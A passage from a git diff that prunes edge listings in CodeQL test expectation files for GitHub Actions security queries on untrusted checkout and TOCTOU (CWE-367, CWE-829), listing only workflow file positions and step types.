| Uses Step | -| .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:22:9:23:21 | Run Step | | .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:22:9:23:21 | Run Step | | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | -| .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:18:9:19:21 | Run Step | | .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:18:9:19:21 | Run Step | | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | -| .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:22:9:23:34 | Run Step | | .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:22:9:23:34 | Run Step | | .github/workflows/test4.yml:13:9:16:6 | Uses Step | .github/workflows/test4.yml:16:9:20:6 | Uses Step | -| .github/workflows/test4.yml:13:9:16:6 | Uses Step | .github/workflows/test4.yml:20:9:21:34 | Run Step | | .github/workflows/test4.yml:16:9:20:6 | Uses Step | .github/workflows/test4.yml:20:9:21:34 | Run Step | | .github/workflows/test5.yml:11:9:14:6 | Uses Step | .github/workflows/test5.yml:14:9:18:6 | Uses Step | -| .github/workflows/test5.yml:11:9:14:6 | Uses Step | .github/workflows/test5.yml:18:9:19:11 | Run Step | | .github/workflows/test5.yml:14:9:18:6 | Uses Step | .github/workflows/test5.yml:18:9:19:11 | Run Step | | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | -| .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:17:9:18:11 | Run Step | | .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:17:9:18:11 | Run Step | | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | -| .github/workflows/test7.yml:10:9:13:6 | Uses Step | 
.github/workflows/test7.yml:16:9:17:11 | Run Step | | .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:17:11 | Run Step | | .github/workflows/test8.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/test8.yml:12:9:15:6 | Uses Step | -| .github/workflows/test8.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/test8.yml:15:9:17:2 | Run Step | | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | | .github/workflows/test8.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/test8.yml:23:9:26:6 | Uses Step | -| .github/workflows/test8.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/test8.yml:26:9:28:2 | Uses Step | | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | | .github/workflows/test8.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/test8.yml:34:9:37:6 | Uses Step | -| .github/workflows/test8.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/test8.yml:37:9:37:75 | Run Step | | .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | | .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test11.yml:14:9:19:6 | Uses Step | -| .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test11.yml:19:9:23:6 | Uses Step | -| .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test11.yml:23:9:24:21 | Run Step | | .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | -| .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:23:9:24:21 | Run Step | | .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:23:9:24:21 | Run Step | | .github/workflows/test12.yml:11:9:14:6 | Uses Step: comment-branch | 
.github/workflows/test12.yml:14:9:19:6 | Uses Step | -| .github/workflows/test12.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test12.yml:19:9:20:30 | Run Step | | .github/workflows/test12.yml:14:9:19:6 | Uses Step | .github/workflows/test12.yml:19:9:20:30 | Run Step | | .github/workflows/test13.yml:14:9:17:6 | Uses Step | .github/workflows/test13.yml:17:9:21:6 | Uses Step | -| .github/workflows/test13.yml:14:9:17:6 | Uses Step | .github/workflows/test13.yml:21:9:22:21 | Run Step | | .github/workflows/test13.yml:17:9:21:6 | Uses Step | .github/workflows/test13.yml:21:9:22:21 | Run Step | | .github/workflows/test14.yml:14:9:17:6 | Uses Step | .github/workflows/test14.yml:17:9:21:6 | Uses Step | -| .github/workflows/test14.yml:14:9:17:6 | Uses Step | .github/workflows/test14.yml:21:9:22:21 | Run Step | | .github/workflows/test14.yml:17:9:21:6 | Uses Step | .github/workflows/test14.yml:21:9:22:21 | Run Step | | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | -| .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:21:9:22:21 | Run Step | | .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:21:9:22:21 | Run Step | | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | -| .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:21:9:22:21 | Run Step | | .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:21:9:22:21 | Run Step | | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:20:9:22:6 | Uses Step | -| .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | | .github/workflows/test17.yml:20:9:22:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | | .github/workflows/test18.yml:15:9:19:6 | Uses Step | 
.github/workflows/test18.yml:19:9:24:6 | Uses Step | -| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:24:9:27:6 | Run Step | -| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | -| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | | .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:24:9:27:6 | Run Step | -| .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | -| .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | | .github/workflows/test18.yml:24:9:27:6 | Run Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | -| .github/workflows/test18.yml:24:9:27:6 | Run Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | | .github/workflows/test18.yml:27:9:30:6 | Run Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:21:9:41:49 | Run Step: check | | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:25:7:31:4 | Uses Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:31:7:33:4 | Uses Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | 
.github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:31:7:33:4 | Uses Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | -| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | -| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | -| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses 
Step | | .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | #select diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected index e2c4d9660634..400adb446d26 100644 --- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected 
@@ -1,17 +1,12 @@ edges | .github/workflows/actor.yml:17:9:20:6 | Uses Step | .github/workflows/actor.yml:20:9:21:16 | Run Step | | .github/workflows/comment.yml:13:9:28:6 | Uses Step: issue | .github/workflows/comment.yml:28:9:32:6 | Uses Step | -| .github/workflows/comment.yml:13:9:28:6 | Uses Step: issue | .github/workflows/comment.yml:32:9:34:2 | Run Step | | .github/workflows/comment.yml:28:9:32:6 | Uses Step | .github/workflows/comment.yml:32:9:34:2 | Run Step | | .github/workflows/comment.yml:39:9:54:6 | Uses Step: issue | .github/workflows/comment.yml:54:9:58:6 | Uses Step | -| .github/workflows/comment.yml:39:9:54:6 | Uses Step: issue | .github/workflows/comment.yml:58:9:60:2 | Run Step | | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:22:10:27:7 | Uses Step | -| .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | -| .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | | .github/workflows/deployment.yml:22:10:27:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | -| .github/workflows/deployment.yml:22:10:27:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | | .github/workflows/deployment.yml:27:10:30:7 | Run Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | | .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | | .github/workflows/label_actor.yml:13:9:17:6 | Uses Step | .github/workflows/label_actor.yml:17:9:17:41 | Run Step | 
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
index 60f3370f6d17..092a7187951f 100644
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
@@ -1,350 +1,145 @@ edges | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | -| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | -| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | -| .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | -| 
.github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:26 | Run Step | | .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning12.yml:36:9:38:26 | Run Step | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:21 | Run Step | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:20 | Run Step | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | | .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | | .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | 
| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | | .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | | .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:16:9:18:40 | Run Step | | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | 
.github/workflows/auto_ci.yml:40:9:44:6 | Run Step | -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | -| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | -| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | -| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | -| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | -| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | -| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | -| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | -| .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | -| .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | -| .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | 
.github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | | .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | -| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | -| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | -| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | -| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | -| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | -| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | -| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | -| 
.github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | -| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | -| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | -| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | -| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | | 
.github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | -| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | -| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | -| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | -| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | -| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | -| .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | -| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | -| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | -| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | -| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | | .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | -| .github/workflows/dependabot1.yml:19:9:23:6 | Run 
